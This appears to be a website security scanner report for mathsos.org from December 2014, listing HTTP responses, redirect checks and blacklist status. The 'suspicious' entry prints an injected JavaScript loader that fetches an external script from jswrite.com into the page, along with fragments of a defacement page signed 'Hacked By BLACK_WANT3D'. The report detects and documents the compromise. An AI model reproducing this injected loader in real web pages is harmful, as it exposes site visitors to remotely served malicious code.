Scanned pages/files
| Request | Server response | Status |
http://mathsos.org/ | HTTP/1.1 200 OK Date: Mon, 29 Dec 2014 11:44:33 GMT Accept-Ranges: bytes ETag: "c637d9d44d11d01:f629" Server: Microsoft-IIS/6.0 Content-Length: 9588 Content-Location: http://mathsos.org/Default.htm Content-Type: text/html Last-Modified: Sat, 06 Dec 2014 12:11:57 GMT X-Powered-By: ASP.NET | clean |
http://mathsos.org/default.htm | 200 OK Content-Length: 9588 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) if(top == self && typeof window._ws_all_js==='undefined'){
window._ws_all_js = 7; var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By BLACK_WANT3D ...[1874 bytes skipped]... ct: true; cursor: no-drop; onkeydown=" return="" false;'="" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" background="Hacked%20By%20Cv_HackeR_files/dark_wood_2597513860047357397.png" bgcolor="black"><center> <meta http-equiv="Content-Language" content="fa"> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title> Hacked By BLACK_WANT3D </title> <br> <br> <br> <br> <br> <br> <br> <br> <br> <br> <font face="Comic Sans MS" size="8"><font color="white"><span id="ym2eu9v_1" class="ym2eu9v">Hacked</span> By BLACK_WANT3D <br> <p style="text-align: center;"><span style="color: rgb(255, 255, 255);"><font size="4"><stro ...[7836 bytes skipped]... | ||
http://mathsos.org/Hacked%20By%20Cv_HackeR_files/a.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://mathsos.org/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://mathsos.org/Hacked%20By%20Cv_HackeR_files/intext.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mathsos.org
Result:
HTTP/1.1 200 OK
Date: Mon, 29 Dec 2014 11:44:33 GMT
Accept-Ranges: bytes
ETag: "c637d9d44d11d01:f629"
Server: Microsoft-IIS/6.0
Content-Length: 9588
Content-Location: http://mathsos.org/Default.htm
Content-Type: text/html
Last-Modified: Sat, 06 Dec 2014 12:11:57 GMT
X-Powered-By: ASP.NET
...9588 bytes of data.
GET / HTTP/1.1
Host: mathsos.org
Result:
HTTP/1.1 200 OK
Date: Mon, 29 Dec 2014 11:44:33 GMT
Accept-Ranges: bytes
ETag: "c637d9d44d11d01:f629"
Server: Microsoft-IIS/6.0
Content-Length: 9588
Content-Location: http://mathsos.org/Default.htm
Content-Type: text/html
Last-Modified: Sat, 06 Dec 2014 12:11:57 GMT
X-Powered-By: ASP.NET
...9588 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mathsos.org
Referer: http://www.google.com/search?q=mathsos.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mathsos.org
Referer: http://www.google.com/search?q=mathsos.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mathsos.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mathsos.org/
Result: mathsos.org is not infected or malware details are not published yet.
Result: mathsos.org is not infected or malware details are not published yet.